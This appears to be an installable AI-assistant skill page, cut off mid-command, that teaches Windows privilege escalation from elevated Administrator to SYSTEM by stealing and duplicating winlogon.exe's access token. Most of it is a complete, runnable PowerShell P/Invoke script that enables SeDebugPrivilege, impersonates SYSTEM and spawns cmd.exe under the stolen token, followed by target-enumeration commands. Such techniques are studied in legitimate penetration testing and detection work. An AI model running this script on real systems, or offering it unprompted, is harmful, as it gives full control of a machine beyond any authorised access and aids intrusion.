windows-seimpersonate-privilege-escalation
Install: claude install-skill abelrguezr/hacktricks-skills
# Windows SeImpersonate Privilege Escalation
This skill helps you escalate from High Integrity (an elevated Administrator) to SYSTEM on Windows by opening the access token of a SYSTEM process, impersonating it, duplicating it into a primary token and launching a new process with it. The technique is named after `SeImpersonatePrivilege`, which is what makes impersonating another account's token legal, and it also relies on `SeDebugPrivilege`; Administrators hold both.
## When to Use This Technique
Use this approach when:
- You have High Integrity (Administrator) access on Windows
- You need SYSTEM-level privileges
- You can identify a process running as SYSTEM (like `winlogon.exe`, `wininit.exe`)
- Your token holds `SeDebugPrivilege` (Administrators have it, disabled by default, and can enable it with `AdjustTokenPrivileges`) and `SeImpersonatePrivilege`
## Prerequisites
1. **High Integrity Context**: You must be running as an Administrator at High Integrity level (a UAC-filtered Medium Integrity token does not carry the privileges below)
2. **SeDebugPrivilege**: Required to open a SYSTEM-owned process and its token; it is present but disabled in an elevated Administrator token, so enable it first
3. **SeImpersonatePrivilege**: Required for `ImpersonateLoggedOnUser` to succeed on a token that belongs to a different account (SYSTEM); Administrators hold it
4. **Target Process**: A SYSTEM-owned process whose token you can open (winlogon.exe is ideal: it runs as SYSTEM in every interactive session)
## How It Works
The technique is ordinary Windows token manipulation; nothing is bypassed, the privileges an Administrator already holds simply permit each call:
1. Enable `SeDebugPrivilege` on your current process with `AdjustTokenPrivileges` (check `GetLastError` for `ERROR_NOT_ALL_ASSIGNED`, because the call returns success even when the privilege is not held)
2. Open the target process (e.g., winlogon.exe) with `PROCESS_QUERY_LIMITED_INFORMATION`, which is all `OpenProcessToken` needs
3. Open the process's access token with `OpenProcessToken` requesting `MAXIMUM_ALLOWED` access
4. Impersonate the logged-on user from that token with `ImpersonateLoggedOnUser`; the calling thread now runs as SYSTEM
5. Duplicate the token into a primary token with `DuplicateTokenEx` (`TokenPrimary`), because an impersonation token cannot be used to start a process
6. Spawn a new process (cmd.exe) with `CreateProcessWithTokenW` and the duplicated SYSTEM token; this goes through the Secondary Logon (seclogon) service, so that service must be running
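The six steps as one runnable script, added here as an example and not part of the original page or the hacktricks-skills project. It assumes an elevated (High Integrity) PowerShell session, a running winlogon.exe, and an available Secondary Logon service; the class name `TokenImp` and the helper `Fail` are local to this example.

```powershell
# Added example: High Integrity -> SYSTEM via winlogon's token, using P/Invoke.
# Assumes an elevated PowerShell session; TokenImp and Fail are names chosen for this example.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public class TokenImp {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError; }
    [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
    public const uint SE_PRIVILEGE_ENABLED = 0x2, TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x8;
    public const uint MAXIMUM_ALLOWED = 0x02000000, PROCESS_QUERY_LIMITED_INFORMATION = 0x1000, CREATE_NEW_CONSOLE = 0x10;
    public const int SecurityImpersonation = 2, TokenPrimary = 1, ERROR_NOT_ALL_ASSIGNED = 1300;
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr hProc, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr hToken, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool RevertToSelf();
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool DuplicateTokenEx(IntPtr hTok, uint access, IntPtr attrs, int level, int type, out IntPtr hNew);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint logonFlags, string app, string cmdLine, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
'@

function Fail($step) { throw "$step failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }

# Step 1: enable SeDebugPrivilege on our own token (Administrators hold it, but disabled).
$hSelf = [IntPtr]::Zero
if (-not [TokenImp]::OpenProcessToken([TokenImp]::GetCurrentProcess(), [TokenImp]::TOKEN_ADJUST_PRIVILEGES -bor [TokenImp]::TOKEN_QUERY, [ref]$hSelf)) { Fail 'OpenProcessToken(self)' }
$luid = New-Object TokenImp+LUID
if (-not [TokenImp]::LookupPrivilegeValue($null, 'SeDebugPrivilege', [ref]$luid)) { Fail 'LookupPrivilegeValue' }
$tp = New-Object TokenImp+TOKEN_PRIVILEGES
$tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = [TokenImp]::SE_PRIVILEGE_ENABLED
# AdjustTokenPrivileges returns TRUE even when the privilege is not held; the real answer is in GetLastError.
if (-not [TokenImp]::AdjustTokenPrivileges($hSelf, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)) { Fail 'AdjustTokenPrivileges' }
if ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq [TokenImp]::ERROR_NOT_ALL_ASSIGNED) { throw 'SeDebugPrivilege is not in this token; is the session elevated?' }

# Steps 2-3: open winlogon.exe and its token. Query-limited process access is enough for OpenProcessToken.
$targetPid = (Get-Process winlogon | Select-Object -First 1).Id
$hProc = [TokenImp]::OpenProcess([TokenImp]::PROCESS_QUERY_LIMITED_INFORMATION, $false, $targetPid)
if ($hProc -eq [IntPtr]::Zero) { Fail "OpenProcess($targetPid)" }
$hTok = [IntPtr]::Zero
if (-not [TokenImp]::OpenProcessToken($hProc, [TokenImp]::MAXIMUM_ALLOWED, [ref]$hTok)) { Fail 'OpenProcessToken(winlogon)' }

# Step 4: impersonate (SeImpersonatePrivilege is what allows this) and confirm who the thread now is.
if (-not [TokenImp]::ImpersonateLoggedOnUser($hTok)) { Fail 'ImpersonateLoggedOnUser' }
"Impersonating: $([Security.Principal.WindowsIdentity]::GetCurrent().Name)"   # expected: NT AUTHORITY\SYSTEM

# Step 5: an impersonation token cannot start a process, so duplicate it into a primary token.
$hPrimary = [IntPtr]::Zero
if (-not [TokenImp]::DuplicateTokenEx($hTok, [TokenImp]::MAXIMUM_ALLOWED, [IntPtr]::Zero, [TokenImp]::SecurityImpersonation, [TokenImp]::TokenPrimary, [ref]$hPrimary)) { Fail 'DuplicateTokenEx' }
[void][TokenImp]::RevertToSelf()

# Step 6: spawn cmd.exe under the SYSTEM primary token (goes through the Secondary Logon service).
$si = New-Object TokenImp+STARTUPINFO
$si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
$procInfo = New-Object TokenImp+PROCESS_INFORMATION
if (-not [TokenImp]::CreateProcessWithTokenW($hPrimary, 0, 'C:\Windows\System32\cmd.exe', $null, [TokenImp]::CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null, [ref]$si, [ref]$procInfo)) { Fail 'CreateProcessWithTokenW' }
"Spawned cmd.exe as SYSTEM, PID $($procInfo.dwProcessId)"
```

Two design points worth noting: the `ERROR_NOT_ALL_ASSIGNED` check after `AdjustTokenPrivileges` is the only way to learn that the privilege was not actually enabled, and `RevertToSelf` is called before step 6 so that the new process is created by your own identity holding a SYSTEM primary token rather than from a thread that is still impersonating. If `CreateProcessWithTokenW` fails with the Secondary Logon service stopped, start `seclogon` first or fall back to `CreateProcessAsUserW` (which needs `SeAssignPrimaryTokenPrivilege`, normally only available to services).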
## Usage
### Step 1: Find a Suitable Target Process
Identify a process running as SYSTEM that Administrators can impersonate:
```powershell
# Find winlogon.exe PID (usually safe to impersonate)
Get-Process winlogon | Select-Object Id, ProcessName
# Alternative: Check svchost.exe processes
Get-Process svcho